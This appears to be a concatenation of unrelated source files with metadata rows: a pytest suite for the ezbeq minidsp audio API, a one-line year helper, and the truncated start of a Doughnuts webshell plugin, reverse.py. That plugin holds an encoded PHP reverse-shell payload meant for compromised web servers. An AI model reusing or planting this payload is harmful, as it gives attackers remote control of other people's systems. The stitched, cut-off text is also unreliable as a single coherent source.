@pytest.mark.parametrize("slot", [1, 2, 3, 4])
def test_legacy_multiple_updates_in_one_payload(minidsp_client, minidsp_app, slot):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: activate slot
# and: set master gain
# and: set input gain
payload = [
{
'command': 'activate'
},
{
'channel': 'master',
'value': -10.2,
'command': 'gain'
},
{
'channel': '0',
'value': 5.1,
'command': 'gain'
},
{
'channel': '2',
'value': 6.1,
'command': 'gain'
}
]
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
assert r.status_code == 200
# then: expected commands are sent
cmds = verify_cmd_count(config.spy, slot, 4)
assert cmds[0] == "gain -- -10.20"
assert cmds[1] == "input 0 gain -- 5.10"
assert cmds[2] == "input 1 gain -- 5.10"
assert cmds[3] == "input 1 gain -- 6.10"
# and: device state is accurate
slots = verify_master_device_state(r.json, gain=-10.2)
for idx, s in enumerate(slots):
if idx + 1 == slot:
verify_slot(s, idx + 1, active=True, gain=(5.10, 6.10))
else:
verify_slot(s, idx + 1)
def test_legacy_load_unknown_entry(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/device/1", data=json.dumps({'command': 'load', 'id': 'super'}),
content_type='application/json')
assert r.status_code == 404
cmds = config.spy.take_commands()
assert len(cmds) == 0
def test_load_unknown_entry(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/devices/master/filter/1/super")
assert r.status_code == 404
cmds = config.spy.take_commands()
assert len(cmds) == 0
def test_search_all(minidsp_client, minidsp_app):
r = minidsp_client.get(f"/api/1/search")
assert r.status_code == 200
catalogue = r.json
assert catalogue
assert len(catalogue) == 1
entry = catalogue[0]
assert entry['id'] == '123456_0'
assert entry['title'] == 'Alien Resurrection'
def test_search_no_match(minidsp_client, minidsp_app):
r = minidsp_client.get(f"/api/1/search", query_string={'authors': 'me'})
assert r.status_code == 200
catalogue = r.json
assert len(catalogue) == 0
def test_authors(minidsp_client):
r = minidsp_client.get(f"/api/1/authors")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 'aron7awol'
def test_contenttypes(minidsp_client):
r = minidsp_client.get(f"/api/1/contenttypes")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 'film'
def test_years(minidsp_client):
r = minidsp_client.get(f"/api/1/years")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 1997
def test_audiotypes(minidsp_client):
r = minidsp_client.get(f"/api/1/audiotypes")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 'DTS-HD MA 5.1'
def test_metadata(minidsp_client):
r = minidsp_client.get(f"/api/1/meta")
assert r.status_code == 200
data = r.json
assert data
assert data['version'] == '123456'
assert data['loaded']
assert data['count'] == 1
def test_version(minidsp_client):
r = minidsp_client.get(f"/api/1/version")
assert r.status_code == 200
data = r.json
assert data
assert data['version'] == '1.2.3'
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_legacy_load_known_entry_and_then_clear(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps({'command': 'load', 'id': '123456_0'}),
content_type='application/json')
if is_valid:
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 30)
expected_commands = f"""input 0 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 0 bypass off
input 0 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 1 bypass off
input 0 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 2 bypass off
input 0 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 3 bypass off
input 0 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 4 bypass off
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 0 bypass off
input 1 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 1 bypass off
input 1 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 2 bypass off
input 1 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 3 bypass off
input 1 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 4 bypass off
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on"""
assert '\n'.join(cmds) == expected_commands
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert not cmds
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx + 1 == slot if is_valid else idx == 0
if is_valid and idx + 1 == slot:
verify_slot(s, idx + 1, active=slot_is_active, last='Alien Resurrection')
else:
verify_slot(s, idx + 1, active=slot_is_active)
if is_valid:
r = minidsp_client.delete(f"/api/1/device/{slot}")
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 24
expected_commands = f"""input 0 peq 0 bypass on
input 0 peq 1 bypass on
input 0 peq 2 bypass on
input 0 peq 3 bypass on
input 0 peq 4 bypass on
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 bypass on
input 1 peq 1 bypass on
input 1 peq 2 bypass on
input 1 peq 3 bypass on
input 1 peq 4 bypass on
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on
input 0 mute off
input 1 mute off
input 0 gain -- 0.00
input 1 gain -- 0.00"""
assert '\n'.join(cmds) == expected_commands
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx + 1 == slot if is_valid else idx == 0
verify_slot(s, idx + 1, active=slot_is_active)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_load_known_entry_and_then_clear(minidsp_client, minidsp_app, slot, is_valid):
    """Loading catalogue entry 123456_0 into a slot sends the expected PEQ
    commands (valid slots 1-4) or 400s with no commands (slots 0 and 5);
    a follow-up DELETE then bypasses every filter and resets mute/gain.
    """
    config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
    assert isinstance(config, MinidspSpyConfig)
    r = minidsp_client.put(f"/api/1/devices/master/filter/{slot}", data=json.dumps({'entryId': '123456_0'}),
                           content_type='application/json')
    if is_valid:
        assert r.status_code == 200
        # 30 commands = 2 input channels x (5 set + 5 bypass off + 5 bypass on)
        cmds = verify_cmd_count(config.spy, slot, 30)
        expected_commands = """input 0 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 0 bypass off
input 0 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 1 bypass off
input 0 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 2 bypass off
input 0 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 3 bypass off
input 0 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 4 bypass off
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 0 bypass off
input 1 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 1 bypass off
input 1 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 2 bypass off
input 1 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 3 bypass off
input 1 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 4 bypass off
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on"""
        assert '\n'.join(cmds) == expected_commands
    else:
        assert r.status_code == 400
        cmds = config.spy.take_commands()
        assert not cmds
    slots = verify_master_device_state(r.json)
    for idx, s in enumerate(slots):
        # an invalid request leaves slot 1 active (the device default)
        slot_is_active = idx + 1 == slot if is_valid else idx == 0
        if is_valid and idx + 1 == slot:
            verify_slot(s, idx + 1, active=slot_is_active, last='Alien Resurrection')
        else:
            verify_slot(s, idx + 1, active=slot_is_active)
    if is_valid:
        r = minidsp_client.delete(f"/api/1/devices/master/filter/{slot}")
        assert r.status_code == 200
        cmds = config.spy.take_commands()
        # 24 commands = 20 bypasses + 2 mute resets + 2 gain resets
        assert len(cmds) == 24
        expected_commands = """input 0 peq 0 bypass on
input 0 peq 1 bypass on
input 0 peq 2 bypass on
input 0 peq 3 bypass on
input 0 peq 4 bypass on
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 bypass on
input 1 peq 1 bypass on
input 1 peq 2 bypass on
input 1 peq 3 bypass on
input 1 peq 4 bypass on
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on
input 0 mute off
input 1 mute off
input 0 gain -- 0.00
input 1 gain -- 0.00"""
        assert '\n'.join(cmds) == expected_commands
        slots = verify_master_device_state(r.json)
        for idx, s in enumerate(slots):
            slot_is_active = idx + 1 == slot if is_valid else idx == 0
            verify_slot(s, idx + 1, active=slot_is_active)
def test_patch_multiple_fields(minidsp_client, minidsp_app):
    """PATCHing master volume, master mute and per-slot gains in one payload
    sends the per-input gain commands first, then mute, then master gain.
    """
    config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
    assert isinstance(config, MinidspSpyConfig)
    # when: set master gain
    # and: set input gains
    payload = {
        'masterVolume': -10.2,
        'mute': True,
        'slots': [
            {
                'id': '2',
                'gain1': 5.1,
                'gain2': 6.1
            }
        ]
    }
    r = minidsp_client.patch("/api/1/devices/master", data=json.dumps(payload), content_type='application/json')
    assert r.status_code == 200
    # then: expected commands are sent
    cmds = verify_cmd_count(config.spy, 2, 4)
    assert cmds[0] == "input 0 gain -- 5.10"
    assert cmds[1] == "input 1 gain -- 6.10"
    assert cmds[2] == "mute on"
    assert cmds[3] == "gain -- -10.20"
    # and: device state is accurate
    slots = verify_master_device_state(r.json, mute=True, gain=-10.2)
    for idx, s in enumerate(slots):
        if idx + 1 == 2:
            verify_slot(s, idx + 1, active=True, gain=(5.10, 6.10))
        else:
            verify_slot(s, idx + 1)
def test_patch_multiple_slots(minidsp_client, minidsp_app):
    """PATCHing two slots at once applies gains to slot 2, then activates and
    fully programs slot 3 (gains, mutes, catalogue entry), then master gain.
    """
    config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
    assert isinstance(config, MinidspSpyConfig)
    # when: set master gain
    # and: set input gains
    payload = {
        'masterVolume': -10.2,
        'slots': [
            {
                'id': '2',
                'gain1': 5.1,
                'gain2': 6.1
            },
            {
                'id': '3',
                'gain1': -1.1,
                'gain2': -1.1,
                'entry': '123456_0',
                'mute1': False,
                'mute2': False
            }
        ]
    }
    r = minidsp_client.patch("/api/1/devices/master", data=json.dumps(payload), content_type='application/json')
    assert r.status_code == 200
    # then: expected commands are sent
    cmds = verify_cmd_count(config.spy, 2, 38)
    expected_commands = """input 0 gain -- 5.10
input 1 gain -- 6.10
config 2
input 0 gain -- -1.10
input 1 gain -- -1.10
input 0 mute off
input 1 mute off
input 0 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 0 bypass off
input 0 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 1 bypass off
input 0 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 2 bypass off
input 0 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 3 bypass off
input 0 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 4 bypass off
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 0 bypass off
input 1 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 1 bypass off
input 1 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 2 bypass off
input 1 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 3 bypass off
input 1 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 4 bypass off
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on
gain -- -10.20"""
    assert '\n'.join(cmds) == expected_commands
    # and: device state is accurate
    slots = verify_master_device_state(r.json, gain=-10.2)
    for idx, s in enumerate(slots):
        if idx == 1:
            verify_slot(s, idx + 1, gain=(5.10, 6.10))
        elif idx == 2:
            verify_slot(s, idx + 1, active=True, gain=(-1.1, -1.1), last='Alien Resurrection')
        else:
            verify_slot(s, idx + 1)
def test_reload_from_cache(minidsp_client, tmp_path):
    """Slot state persisted to the cache file is restored on startup, while
    master-level state (mute/volume) deliberately is not.
    """
    from ezbeq.minidsp import MinidspState
    expected = MinidspState('master')
    expected.update_master_state(True, -5.4)
    slot = expected.get_slot('2')
    slot.mute(None)
    slot.gain1 = 4.8
    slot.active = True
    slot.last = 'Testing'
    # with-block ensures the cache file is flushed before the client reads it
    with open(os.path.join(tmp_path, 'master.json'), 'w') as f:
        json.dump(expected.serialise(), f, sort_keys=True)
    r = minidsp_client.get("/api/1/devices")
    assert r.status_code == 200
    # master state is not restored
    slots = verify_master_device_state(r.json)
    for idx, s in enumerate(slots):
        if idx == 1:
            verify_slot(s, idx + 1, active=True, gain=(4.8, 0.0), mute=(True, True), last='Testing')
        else:
            verify_slot(s, idx + 1)
@pytest.mark.parametrize("outputs",
                         [[], [1], [2], [3], [4], [1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 3], [1, 2, 4],
                          [1, 3, 4], [2, 3, 4], [1, 2, 3, 4]], ids=str)
@pytest.mark.parametrize("inputs", [[], [1], [2], [1, 2]], ids=str)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_load_custom_biquads(minidsp_client, minidsp_app, slot, is_valid, inputs, outputs):
    """Uploading a 10-biquad text block programs every selected input/output
    channel identically; 1-based channel ids map to 0-based minidsp channels.
    Invalid slots must 400.
    """
    config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
    assert isinstance(config, MinidspSpyConfig)
    # when: load biquads
    biquads = """
biquad1,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad2,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad3,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad4,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad5,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad6,
b0=1.0005426820797225,
b1=-1.9979198828450513,
b2=0.9973892456913641,
a1=1.9979233065003874,
a2=-0.9979285041157505,
biquad7,
b0=1.0005426820797225,
b1=-1.9979198828450513,
b2=0.9973892456913641,
a1=1.9979233065003874,
a2=-0.9979285041157505,
biquad8,
b0=1.0008712609026622,
b1=-1.996065923472451,
b2=0.9952168257035099,
a1=1.996065923472451,
a2=-0.9960880866061722,
biquad9,
b0=1.0,
b1=0.0,
b2=0.0,
a1=-0.0,
a2=-0.0,
biquad10,
b0=1.0,
b1=0.0,
b2=0.0,
a1=-0.0,
a2=-0.0"""
    payload = {
        'overwrite': False,
        'inputs': inputs,
        'outputs': outputs,
        'slot': str(slot),
        'biquads': biquads
    }
    r = minidsp_client.put("/api/1/devices/master/biquads", data=json.dumps(payload), content_type='application/json')
    if is_valid:
        assert r.status_code == 200
        single_channel_cmds = [
            'peq 0 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
            'peq 0 bypass off',
            'peq 1 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
            'peq 1 bypass off',
            'peq 2 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
            'peq 2 bypass off',
            'peq 3 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
            'peq 3 bypass off',
            'peq 4 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
            'peq 4 bypass off',
            'peq 5 set -- 1.0005426820797225 -1.9979198828450513 0.9973892456913641 1.9979233065003874 -0.9979285041157505',
            'peq 5 bypass off',
            'peq 6 set -- 1.0005426820797225 -1.9979198828450513 0.9973892456913641 1.9979233065003874 -0.9979285041157505',
            'peq 6 bypass off',
            'peq 7 set -- 1.0008712609026622 -1.996065923472451 0.9952168257035099 1.996065923472451 -0.9960880866061722',
            'peq 7 bypass off',
            'peq 8 set -- 1.0 0.0 0.0 -0.0 -0.0',
            'peq 8 bypass off',
            'peq 9 set -- 1.0 0.0 0.0 -0.0 -0.0',
            'peq 9 bypass off'
        ]

        def expand(prefix, channels):
            # channel ids in the payload are 1-based; commands are 0-based
            return [f"{prefix} {c - 1} {l}" for c in channels for l in single_channel_cmds]

        expected_commands = []
        if inputs:
            expected_commands += expand('input', inputs)
        if outputs:
            expected_commands += expand('output', outputs)
        total_channel_count = len(inputs) + len(outputs)
        # then: expected commands are sent (20 commands per channel)
        cmds = verify_cmd_count(config.spy, slot, 20 * total_channel_count)
        assert cmds == expected_commands
        # and: device state is accurate; only input-channel loads mark the slot as CUSTOM
        slots = verify_master_device_state(r.json)
        for idx, s in enumerate(slots):
            if idx == slot - 1:
                if inputs:
                    verify_slot(s, idx + 1, active=True, last='CUSTOM')
                else:
                    verify_slot(s, idx + 1, active=True)
            else:
                verify_slot(s, idx + 1)
    else:
        assert r.status_code == 400
def test_load_single_biquad(minidsp_client, minidsp_app):
    """With overwrite=True, a single uploaded biquad programs peq 0 and
    explicitly bypasses the remaining nine filters on the target channel.
    """
    config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
    assert isinstance(config, MinidspSpyConfig)
    # when: load biquads
    biquads = """
biquad1,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
"""
    payload = {
        'overwrite': True,
        'inputs': [],
        'outputs': [1],
        'slot': '1',
        'biquads': biquads
    }
    r = minidsp_client.put("/api/1/devices/master/biquads", data=json.dumps(payload), content_type='application/json')
    assert r.status_code == 200
    single_channel_cmds = [
        'peq 0 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
        'peq 0 bypass off',
        'peq 1 bypass on',
        'peq 2 bypass on',
        'peq 3 bypass on',
        'peq 4 bypass on',
        'peq 5 bypass on',
        'peq 6 bypass on',
        'peq 7 bypass on',
        'peq 8 bypass on',
        'peq 9 bypass on'
    ]
    # output channel 1 in the payload maps to minidsp output 0
    expected_commands = [f"output 0 {l}" for l in single_channel_cmds]
    # then: expected commands are sent
    cmds = verify_cmd_count(config.spy, 1, 11)
    assert cmds == expected_commands
    # and: device state is accurate
    slots = verify_master_device_state(r.json)
    for idx, s in enumerate(slots):
        if idx == 0:
            verify_slot(s, idx + 1, active=True)
        else:
            verify_slot(s, idx + 1)
@pytest.mark.parametrize('endpoint', ['details', 'filters'])
def test_get_by_digest(minidsp_client, minidsp_app, endpoint):
    """A catalogue entry is retrievable by digest via both sub-endpoints."""
    response = minidsp_client.get(f"/api/1/catalogue/abcdefghijklm/{endpoint}")
    assert response.status_code == 200
    body = response.json
    assert body
    assert body['digest'] == 'abcdefghijklm'
    assert body['title'] == 'Alien Resurrection'
@pytest.mark.parametrize('endpoint', ['details', 'filters'])
def test_get_by_digest_404(minidsp_client, minidsp_app, endpoint):
    """An unknown digest yields a 404 from both catalogue sub-endpoints."""
    response = minidsp_client.get(f"/api/1/catalogue/abcdefghijkl/{endpoint}")
    assert response.status_code == 404
| 37.399229
| 149
| 0.660392
| 5,595
| 38,783
| 4.448257
| 0.044147
| 0.041787
| 0.034997
| 0.028005
| 0.871183
| 0.853263
| 0.842293
| 0.821882
| 0.811998
| 0.783832
| 0
| 0.172399
| 0.213599
| 38,783
| 1,036
| 150
| 37.435328
| 0.643628
| 0.018281
| 0
| 0.670022
| 0
| 0.045861
| 0.318737
| 0.040292
| 0
| 0
| 0
| 0
| 0.176734
| 1
| 0.053691
| false
| 0.134228
| 0.006711
| 0.001119
| 0.064877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3bf39288de2f8e4562707e4b1af892a8cdcae5eb
| 73
|
py
|
Python
|
api/utils.py
|
mateusvictor/School-API
|
eff0ff3ee8d07fc89e8688615ec685e3dbfc0478
|
[
"MIT"
] | null | null | null |
api/utils.py
|
mateusvictor/School-API
|
eff0ff3ee8d07fc89e8688615ec685e3dbfc0478
|
[
"MIT"
] | null | null | null |
api/utils.py
|
mateusvictor/School-API
|
eff0ff3ee8d07fc89e8688615ec685e3dbfc0478
|
[
"MIT"
] | null | null | null |
import datetime
def current_year():
    """Return the current year (int) according to the local date."""
    today = datetime.date.today()
    return today.year
| 12.166667
| 34
| 0.767123
| 10
| 73
| 5.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123288
| 73
| 5
| 35
| 14.6
| 0.859375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
020181c4bcbb8c70ac7a7b5056b0d9747fc3da2f
| 9,376
|
py
|
Python
|
doughnuts/libs/functions/webshell_plugins/reverse.py
|
MorouU/Doughnuts
|
ca4777551b27e6dbe9015827ecf091b1dafcd064
|
[
"MIT"
] | 5
|
2020-10-09T05:01:34.000Z
|
2020-11-15T08:38:06.000Z
|
doughnuts/libs/functions/webshell_plugins/reverse.py
|
SkyBlueEternal/Doughnuts
|
8d82cffd3e4867f5e87ce35bdcf53678049c579c
|
[
"MIT"
] | 1
|
2020-11-10T03:44:57.000Z
|
2020-11-10T03:44:57.000Z
|
doughnuts/libs/functions/webshell_plugins/reverse.py
|
SkyBlueEternal/Doughnuts
|
8d82cffd3e4867f5e87ce35bdcf53678049c579c
|
[
"MIT"
] | null | null | null |
def get_php_reverse_php():
return {
"windows":"""
header('Content-type: text/plain');
$payload = "7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGKMjXUoxZGWentbq1gpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDm+tt9b966233l7Z39779/32zvedZJ3z7RO1yQjgAAAAUUUQALgAvBEO8D+LBlWqcx0VqLK+4XIBw7vhEr9VooKylIoMpVAGpQnlcgUMpYohpVoOSeRQSHQcJFOIxB42NiT22xoxoQDAw+CAH1KaY/9dtw+g4cgYrAMAoQEd1ZPopwG1lai2v13dDI59s27M2/W/TX4zhwru9Qi9jem/4fTfbwKt54cB/mPZagIA5n+QlxCT5PnaOfm7BWH/cn37UJ7Xv7fxev+z/srjvOF5/7a59rccu7/wTD4enitmvtzFxhprXWZ0rHvn3Z0jVw8CQCEVZbgBwCIACBhqQ5A47ZBfeQSHAxSZYNa1EDYRIIDY6p7xKZBNRdrZFDKdsWhgWF7TTaW3gQTrZJAUYHCfCBjvctfh6OWAJ2clIOCA+My6kdq5XGeKqxuRW9f10cvkcqZAGaR32rvd+nNwlW5jf6ZCH0zX+c8X2V52wbV4xoBS/a2R+nP2XDqFfFHbPzabyoKHbB406JcRj/qVH/afPHd5GLfBPH+njrX2ngFeBChqqmU0N72r53JM4H57U07gevzjnkADXhlVj5kNEHeokIzlhdpJDK3wuc0tWtFJwiNpzWUvk7bJbXOjmyE7+CAcGXj4Vq/iFd4x8IC613I+0IoWFOh0qxjnLUgAYYnLcL3N+W/tCi8ggKXCq2vwNK6+8ilmiaHKSPZXdKrq1+0tVHkyV/tH1O2/FHtxVgHmccSpoZa5ZCO9O3V3P6aoKyn/n69K535eDrNc9UQfmDw6aqiuNFx0xctZ+zBD7SOT9oXWA5kvfUqcLxkjF2Ejy49W7jc/skP6dOM0oxFIfzI6qbehMItaYb8E3U/NzAtnH7cCnO7YlAUmKuOWukuwvn8B0cHa1a9nZJS8oNVsvJBkGTRyt5jjDJM5OVU87zRk+zQjcUPcewVDSbhr9dcG+q+rDd+1fVYJ1NEnHYcKkQnd7WdfGYoga/C6RF7vlEEEvdTgT6uwxAQM5c4xxk07Ap3yrfUBLREvDzdPdI0k39eF1nzQD+SR6BSxed1mCWHCRWByfej33WjX3vQFj66FVibo8bb1TkNmf0NoE/tguksTNnlYPLsfsANbaDUBNTmndixgsCKb9QmV4f2667Z1n8QbEprwIIfIpoh/HnqXyfJy/+SnobFax1wSy8tXWV30MTG1UlLVKPbBBUz29QEB33o2tiVytuBmpZzsp+JEW7yre76w1XOIxA4WcURWIQwOuRd0D1D3s1zYxr6yqp8beopn30tPIdEut1sTj+5gdlNSGHFs/cKD6fTGo1WV5MeBOdV5/xCHpy+WFvLO5ZX5saMyZrnN9mUzKht+IsbT54QYF7mX1j7rfnnJZkjm72BJuUb3LCKyMJiRh23fktIpRF2RHWmszSWNyGSlQ1HKwc9jW6ZX3xa693c8b1UvcpAvV84NanvJPmb9ws+1HrrKAphe9MaUCDyGUPxx+osUevG0W3D6vhun9AX2DJD+nXlua7tLnFX197wDTIqn/wcX/4nEG8RjGzen8LcYhNP3kYXtkBa28TMS2ga0FO+WoY7uMdRA9/r7drdA2udNc7d6U7C39NtH7QvGR1ecwsH0Cxi7JlYjhf3A3J76iz5+4dm9fUxwqLOKdtF1jW0Nj7ehsiLQ7f6P/CE+NgkmXbOieExi4Vkjm6Q7KEF+dpyRNQ12mktNSI9zwYjVlVfYovFdj2P14DHhZf0I7TB22IxZ+Uw95Lt+xWmPzW7zThCb2prMRywnBz4a5o+bplyAo0eTdI3vOtY0TY1DQMwx0jGv9r+T53zhnjqii4yjffa3TyjbRJaGHup48xmC1obViCFrVu/uWY2daHTSAFQQwLww7g8m
